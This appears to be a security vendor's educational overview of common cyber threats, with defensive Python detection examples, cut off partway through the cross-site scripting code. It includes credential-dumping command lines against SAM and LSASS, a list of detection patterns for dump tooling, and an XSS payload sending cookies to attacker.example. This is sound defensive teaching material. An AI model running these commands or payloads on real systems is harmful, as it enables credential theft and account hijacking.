
Top 50 Cybersecurity Threats

The Splunk Threat Research Team (STRT) lists some of the biggest cybersecurity threats out there — grouped by the MITRE ATT&CK framework’s threat tactics — to help you stay ahead of hackers.


Command and control

Command and Control

What you need to know: Command and control (C2) is the infrastructure and communication channel an attacker uses to talk to systems they have already compromised: the attacker takes over a computer and then uses that channel to issue commands, push additional malware or stage further systems on the network. In some cases, the attacker performs reconnaissance activities, moving laterally across the network to gather sensitive data.

In other attacks, hackers may use this infrastructure to launch actual attacks. One of the most important functions of this infrastructure is to establish servers that will communicate with implants on compromised endpoints. These attacks are also often referred to as C2 or C&C attacks.

Most attackers get a foothold by phishing a user and then installing malware. The malware establishes a command and control channel that proxies data between the compromised endpoint and the attacker: commands flow in to the endpoint, and the output of those commands (along with any stolen data) flows back out.

There have been prominent command and control attacks originating from Russia, Iran and even the U.S. These attackers can come from anywhere and everywhere — but they don’t want you to know that. 

Since communication is critical, attackers use techniques designed to hide the true nature of their traffic. They want to keep operating for as long as possible without being detected, so they blend in with normal traffic (for example, HTTPS to a plausible-looking domain), add jitter to their beacon intervals and keep volumes low. The flip side for defenders is that an implant has to check in eventually, and that check-in is usually more regular than human-driven browsing.
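To make the detection side concrete, here is an added example (not code from the page or from Splunk) that flags beacon-like traffic in a handful of constructed proxy log lines. It assumes a simplified "timestamp source destination bytes" line format; the hosts, addresses and timings are constructed for illustration. Each source/destination pair is scored on how regular its connection interval and request size are, which is the signature of an implant with little or no jitter.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: "timestamp src_ip dest_host bytes_sent" per line.
# 10.0.0.5 checks in every ~60 s with near-identical request sizes (beacon-like);
# 10.0.0.7 is ordinary, bursty browsing.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 cdn.example-update.net 512
2024-03-01T10:01:00 10.0.0.5 cdn.example-update.net 498
2024-03-01T10:02:01 10.0.0.5 cdn.example-update.net 503
2024-03-01T10:03:00 10.0.0.5 cdn.example-update.net 511
2024-03-01T10:04:00 10.0.0.5 cdn.example-update.net 507
2024-03-01T10:05:01 10.0.0.5 cdn.example-update.net 499
2024-03-01T10:00:12 10.0.0.7 www.wikipedia.org 83212
2024-03-01T10:00:45 10.0.0.7 www.wikipedia.org 2201
2024-03-01T10:07:03 10.0.0.7 www.wikipedia.org 40512
2024-03-01T10:21:30 10.0.0.7 www.wikipedia.org 1209
2024-03-01T10:22:10 10.0.0.7 www.wikipedia.org 77812
"""


def parse_log(log_text):
    """Group (timestamp, bytes) events by (src_ip, dest_host)."""
    conns = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, size = line.split()
        conns[(src, dst)].append((datetime.fromisoformat(ts), int(size)))
    return conns


def beacon_stats(events):
    """Coefficient of variation (stdev / mean) of inter-arrival gaps and of request sizes.

    A low CV means "same interval, same size, over and over", which is how an
    implant with little or no jitter looks; human browsing is far noisier."""
    if len(events) < 4:
        return None
    events = sorted(events)
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
    sizes = [size for _, size in events]
    mean_gap, mean_size = mean(gaps), mean(sizes)
    return {
        "count": len(events),
        "mean_gap_s": mean_gap,
        "gap_cv": pstdev(gaps) / mean_gap if mean_gap else float("inf"),
        "size_cv": pstdev(sizes) / mean_size if mean_size else float("inf"),
    }


def find_beacons(log_text, max_gap_cv=0.1, max_size_cv=0.1, min_count=5):
    """Return (src, dst, stats) for pairs whose timing and size regularity fall
    under the thresholds. The thresholds are tuning knobs, not constants."""
    hits = []
    for (src, dst), events in parse_log(log_text).items():
        stats = beacon_stats(events)
        if (stats and stats["count"] >= min_count
                and stats["gap_cv"] <= max_gap_cv
                and stats["size_cv"] <= max_size_cv):
            hits.append((src, dst, stats))
    return hits


if __name__ == "__main__":
    for src, dst, stats in find_beacons(SAMPLE_LOG):
        print(f"beacon candidate: {src} -> {dst} every ~{stats['mean_gap_s']:.0f}s "
              f"(gap CV {stats['gap_cv']:.3f}, size CV {stats['size_cv']:.3f})")
```

Real implants add jitter and sleep for much longer than a minute, so in practice you widen the tolerances, look over hours or days, and combine the regularity score with how rare or new the destination is across the whole fleet; regularity alone will also catch software update checks and monitoring agents.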


IoT Threats

What you need to know: There are an estimated 13.1 billion connected IoT devices globally, a number that is projected to increase to 30 billion by 2030. These devices often lack basic security controls, creating glaring vulnerabilities in the network that greatly expand the attack surface and leave it susceptible to malware. Attacks delivered over IoT devices can include DDoS, ransomware and social engineering threats.

Hackers and malicious nation-states can exploit vulnerabilities in connected IoT devices with sophisticated malware to gain access to a network so they can monitor users or steal intellectual property, classified or personally identifying data and other critical information. Once they infiltrate an IoT system, attackers can also use their newly gained access for lateral movement to other connected devices or to gain entry to the wider network for various malicious purposes.

Attacks can come from anywhere in the world. But because many verticals such as government, manufacturing and healthcare are deploying IoT infrastructure without proper security protections, these systems are targets for attacks by hostile nation-states and sophisticated cybercrime organizations. Unlike attacks against purely IT infrastructure, attacks against connected civic or healthcare systems could lead to widespread disruption, panic and physical harm.

Ransomware

What you need to know: Ransomware is an attack where an infected host encrypts a victim’s data, holding it hostage until they pay the attacker a fee. Recent ransomware attacks have demonstrated that hackers have begun threatening to leak or sell the stolen data, increasing the potential damage of these kinds of attacks by orders of magnitude. 

There are countless types of ransomware, but certain groups are especially nefarious. One well-known gang, BlackMatter, has targeted a number of organizations critical to the U.S. economy and infrastructure, including the food and agriculture industry. Ryuk is another type of ransomware to watch out for. As of 2019, Ryuk had the highest ransom on record at $12.5 million.

Attackers can deploy ransomware to businesses and individuals through spear phishing campaigns and drive-by downloads, as well as through traditional remote service-based exploitation. Once the malware is installed on the victim’s machine, it either prompts the user with a pop-up or directs them to a website, where they’re informed that their files are encrypted and can be released if they pay the ransom.

Ransomware has typically been the work of advanced cybercriminal groups, since remaining anonymous after extorting governments or major enterprises requires technological sophistication. However, since the arrival of cryptocurrencies, which simplify anonymous payment, the barrier to entry has dropped and the general population is at greater risk of ransomware attack.


Credential access

Account Takeover

What you need to know: Account takeover (ATO) means an attacker gaining control of a victim's existing account rather than simply using a stolen card number or password once. It is more surreptitious: the attacker aims to get as much use out of the hijacked account as possible before it is flagged for suspicious activity. Banks, major marketplaces and financial services like PayPal are common targets, but any website that requires a login is susceptible to this attack.

Some of the most common methods include proxy-based "checker" one-click apps, brute force botnet attacks, phishing and malware. Other methods include dumpster diving to find personal information in discarded mail, and outright buying lists of “Fullz,” a slang term for full packages of identifying information sold on the black market. Once the profile of the victim is purchased or built, an identity thief can use the information to defeat a knowledge-based authentication system.

An enormous volume of our transactions — financial and otherwise — take place online. For cybercriminals, acquiring account credentials and personal information (like social security numbers, home addresses, phone numbers, credit card numbers and other financial information) is a lucrative business, whether they choose to sell the acquired information or use it for their own gain. As such, these kinds of attacks can originate anywhere in the world.


Brute Force Attack 

What you need to know: A brute force attack aims to guess credentials, specifically usernames and passwords, by trial and error. It is one of the simplest ways to gain access to an application, server or password-protected account, since the attacker is simply trying combinations until one works (if one ever does: a six-character password drawn from the printable ASCII set has roughly 735 billion possibilities, which is out of reach for online guessing against a rate-limited login but only a matter of minutes for a GPU cracker working against a weakly hashed password database).

The most common variant is a dictionary attack, where the attacker systematically works through a wordlist, trying each entry until one hits. Attackers augment words with symbols and numerals (so-called rules), or use wordlists built from leaked and commonly used passwords. Automated tools make this fast and cheap, so the limiting factor is rarely the attacker's patience.

Thanks to the ease and simplicity of a brute force attack, hackers and cyber criminals with little-to-no technical experience can try to gain access to someone’s account. The people behind these campaigns either have enough time or computational power on their side to make it happen. 


Compromised Credentials

What you need to know: Most people still rely on single-factor authentication (a password alone), which is a major weakness. And while stricter password requirements are now common (minimum length, a mix of symbols and numbers, forced renewal intervals), end users still reuse credentials across accounts, platforms and applications. Note that forced periodic rotation is no longer recommended by NIST SP 800-63B, which favours length, screening against breached-password lists and multi-factor authentication instead.

This makes it easier for adversaries to access a user's accounts, and a large share of today's breaches stem from credential harvesting campaigns.

A password, key or other identifier that’s been discovered can be used by a threat actor to gain unauthorized access to information and resources, and can range from a single account to an entire database.


By leveraging a trusted account within a targeted organization, a threat actor can operate undetected and exfiltrate sensitive data sets without raising any red flags. Common methods for harvesting credentials include the use of password sniffers, phishing campaigns or malware attacks.

Compromised credentials represent a huge attack vector, giving threat actors a way into computing devices, password-protected accounts and an organization’s network infrastructure with relative ease. These perpetrators are often organized, with their sights set on a specific organization or person. And they’re not always outside of the organization — they could very well be an insider threat who has some level of legitimate access to the company’s systems and data. 


Credential Dumping

What you need to know: Credential dumping is an attack that gathers credentials from a system the attacker already controls, by reading them out of process memory or from the files and registry hives where the operating system keeps them. Even though the credentials are usually not in plain text (they are hashed or encrypted), an attacker can still extract the data and crack it offline on their own systems or, in the case of Windows NTLM hashes, reuse the hash directly in a pass-the-hash attack. The "dump" refers to copying the credential store or process memory out in bulk.

Often, hackers will try to steal passwords from systems they have already compromised. The problem becomes amplified when users replicate the same password across multiple accounts through multiple systems. 

Credentials obtained this way usually include those of privileged users, which may provide access to more sensitive information and system operations. Attackers target a variety of sources to extract them, including the Security Account Manager (SAM) registry hive, the memory of the Local Security Authority Subsystem Service (LSASS) process, the NTDS.dit database on domain controllers and Group Policy Preference (GPP) files, whose cpassword values can be decrypted with a published key.
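The sources listed above map onto two telemetry signals a defender can watch: a process opening lsass.exe with read access to its memory, and a command line that exports a credential store. The following is an added example, not code from the page or from Splunk, that applies both checks to a few constructed events. The event dictionaries are loosely shaped like Sysmon Event ID 10 (ProcessAccess) and Event ID 1 / Windows 4688 (process creation) fields but are invented for this example; the allowlist of processes that legitimately read LSASS is an assumption that must be tuned per environment.

```python
PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory

# Processes that legitimately open lsass.exe with read access (assumed; tune per environment).
LSASS_READ_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Command-line token pairs that copy a credential store out for offline cracking.
DUMP_COMMAND_PATTERNS = [
    ("reg save", r"hklm\sam"),
    ("reg save", r"hklm\security"),
    ("reg save", r"hklm\system"),
    ("ntdsutil", "ifm"),
    ("procdump", "lsass"),
    ("comsvcs.dll", "minidump"),
]

# Constructed events, loosely shaped like Sysmon Event ID 10 (ProcessAccess)
# and Event ID 1 / Windows 4688 (process creation). Not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process_access", "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1400"},
    {"type": "process_access", "source_image": r"C:\Users\jdoe\AppData\Local\Temp\svc.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"type": "process_access", "source_image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1fffff"},
    {"type": "process_create", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg save HKLM\SAM C:\Temp\sam.hiv"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\lsass.dmp full"},
    {"type": "process_create", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r"reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion"},
]


def check_process_access(event):
    """Alert on any non-allowlisted process that obtains VM_READ on lsass.exe."""
    if not event["target_image"].lower().endswith(r"\lsass.exe"):
        return None
    source = event["source_image"].lower()
    access = int(event["granted_access"], 16)
    if access & PROCESS_VM_READ and source not in LSASS_READ_ALLOWLIST:
        return {"rule": "lsass_memory_read", "process": event["source_image"],
                "detail": event["granted_access"]}
    return None


def check_process_create(event):
    """Alert on command lines that export SAM/SECURITY/SYSTEM hives, NTDS.dit or an LSASS dump."""
    cmd = event["command_line"].lower()
    for first, second in DUMP_COMMAND_PATTERNS:
        if first in cmd and second in cmd:
            return {"rule": "credential_store_dump", "process": event["image"],
                    "detail": event["command_line"]}
    return None


def detect_credential_dumping(events):
    """Run the matching check for each event and collect the alerts in order."""
    checkers = {"process_access": check_process_access,
                "process_create": check_process_create}
    alerts = []
    for event in events:
        checker = checkers.get(event["type"])
        alert = checker(event) if checker else None
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect_credential_dumping(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['process']}: {alert['detail']}")
```

The memory-read check is deliberately broad (any VM_READ, not just the 0x1010 or 0x1fffff masks popular tools request), so expect to grow the allowlist with EDR agents and backup software; the command-line check is narrow and should be extended with the other hive and dump tooling you see in your own environment.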


Once attackers obtain valid credentials, they use them to move throughout a target network with ease, discovering new systems and identifying assets of interest.

Credential dumping can originate from anywhere. And because we’re all guilty of recycling passwords, that information can be sold for future attacks.


Credential Reuse Attack

What you need to know: Credential reuse is a pervasive issue across any company or userbase. Nowadays, most users have tens (if not hundreds) of accounts, and are tasked with remembering countless passwords that meet all sorts of stringent requirements. As a result, they’ll resort to reusing the same password over and over again, in the hopes of better managing and remembering their credentials across accounts. Unsurprisingly, this can cause major security issues when said credentials are compromised.

In theory, the attack itself is simple, straightforward and surprisingly stealthy (if two-factor authentication isn’t activated). Once a user’s credentials are stolen, the culprit can try the same username and password on other consumer or banking websites until they get a match — hence the “reuse” in “credential reuse attack.”


However, obtaining that first set of credentials takes a little more work. Attackers usually kick things off with a phishing attempt, using emails and websites that look close to legitimate to dupe the user into handing over their credentials.

This could be a targeted attack, where the person knows the victim and wants access to their accounts for personal, professional or financial reasons. The attack could also originate from a complete stranger who bought the user’s personal information on the cybercrime underground.


Credential Stuffing

What you need to know: With credential stuffing, cybercriminals will use stolen account credentials — often usernames and passwords procured from a data breach — to access additional accounts by automating thousands or millions of login requests directed against a web application. They want to access sensitive accounts the easy way — by simply logging in. It works because they rely on people reusing the same usernames and passwords across multiple services. If they’re successful, one credential can unlock accounts that house financial and proprietary information, giving them the keys to almost everything. 

Hackers only need access to login credentials, an automated tool and proxies to carry out a credential stuffing attack. Attackers will take a cache of usernames and passwords, gleaned from massive corporate breaches, and by using automated tools, essentially “stuff” those credentials into the logins of other sites.

Proxies mask the location of credential stuffing attackers, making it hard to determine where they are. They can be found all over the world, especially in organized cybercrime hotspots. Often, the attackers are individuals or organized groups with access to dedicated account-checking tools and numerous proxies that keep their IP addresses from being blocked. Less sophisticated perpetrators may give themselves away by hammering a large number of accounts with bots, producing an unintended denial-of-service (DoS) condition on the login endpoint.
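Brute force (many guesses against one account) and credential stuffing (one guess each against many accounts) look very different in an authentication log, which is what makes them detectable. The following is an added example covering both this section and the brute force section above; it is not code from the page or from Splunk. It assumes a simplified "timestamp source_ip username result" log line; the addresses, usernames and outcomes are constructed for illustration.

```python
from collections import defaultdict

# Constructed auth log: "timestamp src_ip username result". Three sources:
# 198.51.100.7 hammers one account (password guessing), 203.0.113.9 tries many
# accounts once each (credential stuffing), 192.0.2.4 is a user who mistyped once.
SAMPLE_AUTH_LOG = """\
2024-03-01T09:00:01 198.51.100.7 alice FAIL
2024-03-01T09:00:02 198.51.100.7 alice FAIL
2024-03-01T09:00:03 198.51.100.7 alice FAIL
2024-03-01T09:00:04 198.51.100.7 alice FAIL
2024-03-01T09:00:05 198.51.100.7 alice FAIL
2024-03-01T09:00:06 198.51.100.7 alice FAIL
2024-03-01T09:00:07 198.51.100.7 alice FAIL
2024-03-01T09:00:08 198.51.100.7 alice FAIL
2024-03-01T09:05:00 203.0.113.9 bob FAIL
2024-03-01T09:05:01 203.0.113.9 carol FAIL
2024-03-01T09:05:02 203.0.113.9 dave FAIL
2024-03-01T09:05:03 203.0.113.9 erin FAIL
2024-03-01T09:05:04 203.0.113.9 frank SUCCESS
2024-03-01T09:05:05 203.0.113.9 grace FAIL
2024-03-01T09:05:06 203.0.113.9 heidi FAIL
2024-03-01T09:05:07 203.0.113.9 ivan FAIL
2024-03-01T09:10:00 192.0.2.4 bob FAIL
2024-03-01T09:10:20 192.0.2.4 bob SUCCESS
"""


def profile_sources(log_text):
    """Per source IP: attempt count, failure count, distinct usernames, successful usernames."""
    stats = defaultdict(lambda: {"attempts": 0, "failures": 0, "users": set(), "successes": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, ip, user, result = line.split()
        entry = stats[ip]
        entry["attempts"] += 1
        entry["users"].add(user)
        if result == "SUCCESS":
            entry["successes"].append(user)
        else:
            entry["failures"] += 1
    return stats


def classify_sources(log_text, min_attempts=6, min_fail_rate=0.5):
    """Label each busy source as brute_force or credential_stuffing.

    spread = distinct users / attempts: near 1.0 means one try per account
    (stuffing); near 0 means the same account over and over (brute force)."""
    verdicts = {}
    for ip, entry in profile_sources(log_text).items():
        if entry["attempts"] < min_attempts:
            continue  # too little activity to judge
        fail_rate = entry["failures"] / entry["attempts"]
        distinct = len(entry["users"])
        spread = distinct / entry["attempts"]
        if spread >= 0.8 and fail_rate >= min_fail_rate:
            verdict = "credential_stuffing"
        elif distinct <= 2 and fail_rate >= 0.8:
            verdict = "brute_force"
        else:
            continue
        verdicts[ip] = {
            "verdict": verdict,
            "attempts": entry["attempts"],
            "distinct_users": distinct,
            "fail_rate": round(fail_rate, 2),
            "successes": entry["successes"],  # accounts that need a reset and session revocation
        }
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_AUTH_LOG).items():
        print(ip, verdict)
```

The most important field in the output is "successes": a stuffing run that logged in as frank means frank's password is known to the attacker and reused elsewhere, so that account needs a forced reset and session revocation, not just an IP block. Because attackers rotate proxies, per-IP counts are evaded easily; in production you also key the same ratios on the target account and on the global failure rate of the login endpoint.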


Data From Information Repositories

What you need to know: Information repositories are tools that allow for the storage of information — tools like Microsoft SharePoint and Atlassian Confluence. Information repositories typically facilitate collaboration or information sharing between users and they store a wide variety of data that may tempt attackers. Hackers may leverage information repositories to access and mine valuable information.

Information repositories often have a large user base, and detecting breaches can be difficult. Attackers may collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications.

Attackers like APT28 target government agencies, hotel booking websites, telecoms and IT companies. At a minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, enterprise or schema administrators) should be closely monitored and alerted upon, because these types of accounts should not generally be used to access information repositories. Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.


Network Sniffing

What you need to know: Network sniffing, also known as packet sniffing, is the real-time capturing, monitoring and analysis of data flowing within a network. Whether it’s via hardware, software or a combination of both, bad actors use sniffing tools to eavesdrop on unencrypted data from network packets, such as credentials, emails, passwords, messages and other sensitive information. 

Much like wiretapping scenarios in which someone listens in on phone calls for sensitive details, network sniffing works in the background, silently listening in as information is exchanged between entities on a network. This happens when attackers place a sniffer on a network via the installation of software or hardware plugged into a device that allows it to intercept and log traffic over the wired or wireless network the host device has access to. Due to the complexity inherent in most networks, sniffers can sit on the network for a long time before being detected.

Network sniffing is often conducted legally by organizations like ISPs, advertising agencies, government agencies and others who need to verify network traffic.


But it can also be launched by hackers doing it for the “lulz” or nation-states looking to pilfer intellectual property. Like ransomware, network sniffers can be injected into the network by getting the right person to click on the right link. Insider threats with access to sensitive hardware could also be a vector for attack.


Privileged User Compromise

What you need to know: It’s widely accepted that many serious data breaches can be traced back to the abuse of privileged credentials. These are accounts with elevated privileges, such as users with domain administrator rights or root privileges. Attackers are increasingly using privileged user credentials to access an organization’s resources and information and exfiltrate sensitive data. An attacker that gains access to privileged user credentials can take control of an organization's infrastructure to modify security settings, exfiltrate data, create user accounts and more, all the while appearing legitimate — and therefore harder to detect.

Attackers attempt to gain access to privileged accounts by using social engineering techniques, sending spear-phishing messages, using malware, or "pass the hash" attacks. Organizations have opened their networks to cope with an increasingly mobile, remote workforce, and enable a complex web of remote access used by suppliers and service providers. Many of those connections, including to the cloud, are accessed through powerful privileged account credentials, and finding, controlling and monitoring access to them all is challenging, giving bad actors plenty of openings.


Once armed with the credentials, attackers get in and grab what they can, such as SSH keys, certificates and domain administrator password hashes. It takes only one successful account compromise to cause a major data breach that can bring an organization to its knees.

Because it gives attackers broad, hard-to-detect access to all kinds of data, privileged user compromise is widely appealing and commonly used in cyber attacks of various kinds, whether nation-state espionage motivated by political ideology or sophisticated, financially motivated cybercrime groups like Lapsus$.


Spyware

What you need to know: Spyware is a type of malware that aims to gather personal or organizational data, track or sell a victim's web activity (e.g., searches, history and downloads), capture bank account information and even steal a target's identity. Multiple types of spyware exist, and each one employs a different tactic to track the victim. Ultimately, spyware can take over a device, exfiltrating data or sending personal information to another unknown entity without the victim's knowledge or consent.

Spyware can install itself on a victim’s device through various means, but will commonly get a foothold in a system by duping the target or exploiting existing vulnerabilities. This can happen when a user carelessly accepts a random prompt or pop-up, downloads software or upgrades from an unreliable source, opens email attachments from unknown senders, or pirates movies and music.

Thanks to crimeware kits that are now readily available, this type of attack can come from anyone and anywhere. But more often than not, they’ll originate from nefarious organizations looking to sell a victim’s information to a third-party.


Web Session Cookie Theft

What you need to know: When an attacker successfully steals a session cookie, they can perform any actions the original user is authorized to take. A danger for organizations is that cookies can be used to identify authenticated users in single sign-on systems, potentially giving the attacker access to all of the web applications the victim can use, like financial systems, customer records or line-of-business systems potentially containing confidential intellectual property.

After a user accesses a service and validates their identity, a cookie is stored on their machine for an extended period of time so that they don’t have to log in over and over. Malicious actors can steal web session cookies through malware, then import the cookie into a browser they control, allowing them to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email or perform actions that the victim’s account has permissions to perform.
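Whether a stolen cookie is useful depends largely on how it was issued: how long it lives, whether page script can read it, and whether it is sent over plain HTTP or on cross-site requests. The following added example (not code from the page or from Splunk) audits Set-Cookie header values for those properties. The header strings are constructed for illustration and the eight-hour lifetime limit is an assumed policy, not a standard.

```python
def audit_set_cookie(header_value, max_age_limit=8 * 3600):
    """Return (cookie_name, issues) for one Set-Cookie header value.

    Checks the attributes that matter for theft and replay: Secure (never sent in
    cleartext), HttpOnly (not readable by page script, so XSS cannot lift it),
    SameSite (not attached to cross-site requests) and lifetime (a stolen cookie is
    only useful while the session it names is still valid)."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() or True  # flag attrs have no value

    issues = []
    if "secure" not in attrs:
        issues.append("missing Secure")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax/Strict")
    if "max-age" in attrs:
        max_age = str(attrs["max-age"])
        if not max_age.isdigit() or int(max_age) > max_age_limit:
            issues.append(f"lifetime exceeds {max_age_limit}s")
    elif "expires" in attrs:
        issues.append("uses Expires; prefer a short Max-Age")
    return name, issues


# Constructed header values: a typical weak cookie, a hardened one using the
# __Host- prefix (which requires Secure, Path=/ and no Domain), and a long-lived SSO cookie.
WEAK = "session=7f3a9c; Path=/"
HARDENED = "__Host-session=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=3600"
LONG_LIVED = "sso=b21e; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=2592000"

if __name__ == "__main__":
    for header in (WEAK, HARDENED, LONG_LIVED):
        name, issues = audit_set_cookie(header)
        print(f"{name}: {issues or 'ok'}")
```

Note the limit of what these attributes buy you: HttpOnly stops script in the page from reading the cookie, but it does nothing against infostealer malware that reads the browser's cookie database from disk, which is the case this section describes. Against that, the controls are short lifetimes, re-authentication for sensitive actions, revoking sessions when a login appears from a new device or location, and, where available, device-bound session mechanisms.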

Cookie theft is commonly accomplished through malware (often an infostealer) that copies the victim's browser cookie store and sends it to the attacker; it can also be done by cross-site scripting when the cookie is not marked HttpOnly. The malware can land on the victim's machine in any of the ways covered in this book, like phishing or malicious document macros. Many hackers engaging in cookie theft belong to larger networks based in Russia and China. The actors behind the cookie-theft campaign against YouTube creators, for example, were found to have been recruited through a Russian-speaking forum.



Business Invoice Fraud

What you need to know: Business invoice fraud attempts to trick victims into paying a fraudulent (but convincing) bill addressed to their organization. In reality, the funds go to imposters mimicking suppliers. These fraudsters will often bill a reasonable amount so they don't draw suspicion. But executing these scams hundreds or thousands of times quickly adds up.

In this attack, victims are sent fake invoices attempting to steal money in the hopes that marks aren’t paying attention to their accounts payable processes. Hackers will pick targets based on the size of their business, location and the suppliers used and create phony invoices that appear legitimate. With the hopes that the victim’s accounts payable department is backlogged, they send false invoices with high demands like “90 days past due, pay now!”

While there are numerous individual scammers pulling off business invoice fraud, many are sourced to fraud rings that have the organization and the resources to research their victim’s banking institution and create a billing experience that feels real. Fraud rings conducting invoice scams can be found all over the world.


Cloud Cryptomining 

What you need to know: Cryptomining is an intentionally difficult, resource-intensive business. Its complexity was designed to ensure that the number of blocks mined each day would remain steady. So it's par for the course that ambitious, yet unscrupulous, miners make amassing the computing power of large enterprises — a practice known as cryptojacking — a top priority. 

Cryptomining has attracted an increasing amount of media attention since its explosion in popularity in the fall of 2017. The attacks have moved from in-browser exploits and mobile phones to enterprise cloud services, such as Amazon Web Services, Google Cloud Platform (GCP) and Microsoft Azure. 

It's difficult to determine exactly how widespread the practice has become, since hackers continually evolve their ability to evade detection, including employing unlisted endpoints, moderating their CPU usage and hiding the mining pool's IP address behind a free content delivery network (CDN). 

When miners hijack a cloud account, often spinning up hundreds of new instances, the costs can become astronomical for the account holder. So it's critical to monitor cloud accounts for suspicious activity that could indicate a compromise.

Because cryptocurrency is a global commodity, the attacks can originate from anywhere. Instead of focusing on where the attacks come from, it’s key to monitor cloud computing instances for activities related to cryptojacking and cryptomining, such as new cloud instances that originate from previously unseen regions, users who launch an abnormally high numbers of instances, or compute instances started by previously unseen users.
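The three signals named above (unseen regions, abnormally high launch counts, unseen users) can be checked against a baseline of normal activity. The following is an added example, not code from the page or from Splunk. Its records are loosely shaped like the user, region and instance count of a CloudTrail RunInstances event but are constructed for illustration; the 20-instance threshold is an assumed policy.

```python
from collections import Counter

# Constructed records. BASELINE is what the account normally does (say, last
# month); WINDOW is the most recent hour. Real CloudTrail records carry far more.
BASELINE = [
    {"user": "ci-deployer", "region": "us-east-1", "count": 2},
    {"user": "ci-deployer", "region": "us-east-1", "count": 2},
    {"user": "alice", "region": "us-east-1", "count": 1},
    {"user": "alice", "region": "eu-west-1", "count": 1},
]
WINDOW = [
    {"user": "ci-deployer", "region": "us-east-1", "count": 3},
    {"user": "alice", "region": "ap-southeast-1", "count": 12},   # region never used before
    {"user": "alice", "region": "ap-southeast-1", "count": 40},   # and far too many instances
    {"user": "temp-svc", "region": "us-east-1", "count": 5},      # identity never seen before
]


def build_baseline(events):
    """The set of identities and regions that have launched instances before."""
    return {e["user"] for e in events}, {e["region"] for e in events}


def find_anomalies(baseline, window, max_instances_per_user=20):
    """Return sorted (rule, user, detail) tuples for launches that break the baseline."""
    known_users, known_regions = build_baseline(baseline)
    per_user = Counter()
    findings = set()
    for event in window:
        per_user[event["user"]] += event["count"]
        if event["region"] not in known_regions:
            findings.add(("new_region", event["user"], event["region"]))
        if event["user"] not in known_users:
            findings.add(("new_user", event["user"], event["region"]))
    for user, total in per_user.items():
        if total > max_instances_per_user:
            findings.add(("high_volume", user, str(total)))
    return sorted(findings)


if __name__ == "__main__":
    for rule, user, detail in find_anomalies(BASELINE, WINDOW):
        print(f"{rule}: {user} ({detail})")
```

Cryptojackers also favour large or GPU instance families and often switch to regions the victim has never enabled, so the same pattern extends naturally to instance type and to the account's enabled-region list; a service control policy that denies launches outside approved regions turns the detection into prevention.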


Cross-Site Scripting

What you need to know: XSS attacks occur when an attacker uses a web application to deliver malicious code, generally in the form of a browser-side script, to a different end user. The flaws that allow these attacks are widespread and occur anywhere a web application includes user-supplied input in its output without validating or encoding it.

The end user's browser has no way to know that the script should not be trusted, so it executes it. Because the script appears to come from the trusted site, it runs in that site's origin and can read cookies that are not marked HttpOnly, session tokens or other sensitive information retained by the browser, and it can rewrite the content of the HTML page.

The two classic types of XSS are stored and reflected. Stored XSS occurs when an injected script is saved on the server, for example in a forum post or comment; every user who loads the affected page is hit. In reflected XSS, the injected script is echoed back to a user in the response to a request they were tricked into making, such as a crafted link to a search results page. A third variant, DOM-based XSS, happens entirely in client-side JavaScript that writes untrusted data into the page.
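The reflected case is easiest to see with the vulnerable rendering beside its fixed form. The following added example (not code from the page or from Splunk) uses Python string formatting as a stand-in for a server-side template and checks the result with the standard library HTML tokenizer, which sees the page roughly the way a browser does. The two payloads are constructed; attacker.example is a placeholder host.

```python
import html
from html.parser import HTMLParser

# Attacker-supplied search queries (constructed). The first targets the HTML body
# context, the second breaks out of a double-quoted attribute value.
SCRIPT_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_results_vulnerable(query):
    """Reflected XSS: the query lands in the page unencoded, in two contexts."""
    return (f"<h1>Results for {query}</h1>\n"
            f'<input name="q" value="{query}">')


def render_results_safe(query):
    """Same page with the query HTML-entity-encoded. quote=True also encodes the
    quotation marks, which is what stops the attribute payload from closing the value."""
    safe = html.escape(query, quote=True)
    return (f"<h1>Results for {safe}</h1>\n"
            f'<input name="q" value="{safe}">')


class ActiveContentFinder(HTMLParser):
    """Tokenizes a rendered page and records anything that would execute:
    <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def active_content(page):
    """List of executable constructs found in the page; empty means the payload stayed inert."""
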